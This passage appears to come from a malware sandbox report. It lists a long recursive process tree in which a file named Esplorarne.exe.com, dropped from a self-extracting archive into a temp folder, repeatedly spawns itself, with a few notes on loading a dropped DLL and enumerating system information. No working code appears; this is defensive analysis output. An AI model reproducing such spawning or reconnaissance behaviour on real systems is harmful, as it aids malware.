        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        396⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        397⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        398⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        399⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        400⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        401⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        402⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        403⤵
        
        PID:6684
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        404⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        405⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        406⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        407⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        408⤵
        
        PID:6768
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        409⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        410⤵
        
        PID:7180
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        411⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        412⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        413⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        414⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        415⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        416⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        417⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        418⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        419⤵
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        420⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        421⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        422⤵
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        423⤵
        
        PID:292
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        424⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        425⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        426⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        427⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        428⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        429⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        430⤵
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        431⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        432⤵
        
        PID:7364
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        433⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        434⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        435⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        436⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        437⤵
        
        PID:7072
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        438⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        439⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        440⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        441⤵
        
        PID:6804
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        442⤵
        
        PID:7140
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        443⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        444⤵
        
        PID:5460
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        445⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        446⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        447⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        448⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        449⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        450⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        451⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        452⤵
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        453⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        454⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        455⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        456⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        457⤵
        
        PID:6372
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        458⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        459⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        460⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        461⤵
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        462⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        463⤵
        
        PID:7976
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        464⤵
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        465⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        466⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        467⤵
        
        PID:6232
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        468⤵
        
        PID:7172
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        469⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        470⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        471⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        472⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        473⤵
        
        PID:8044
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        474⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        475⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        476⤵
        
        PID:6320
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        477⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        478⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        479⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        480⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        481⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        482⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        483⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        484⤵
        
        PID:8124
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        485⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        486⤵
        
        PID:7384
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        487⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        488⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        489⤵
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        490⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        491⤵
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        492⤵
        
        PID:7416
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        493⤵
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        494⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        495⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        496⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        497⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        498⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        499⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        500⤵
        
        PID:6544
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        501⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        502⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        503⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        504⤵
        
        PID:6560
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        505⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        506⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        507⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        508⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        509⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        510⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        511⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        512⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        513⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        514⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        515⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        516⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        517⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        518⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        519⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        520⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        521⤵
        Loads dropped DLL
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        522⤵
        
        PID:7508
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        523⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        524⤵
        
        PID:1912
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        525⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        526⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        527⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        528⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        529⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:7460
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        530⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        531⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        532⤵
        
        PID:6744
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        533⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        534⤵
        
        PID:6884
        
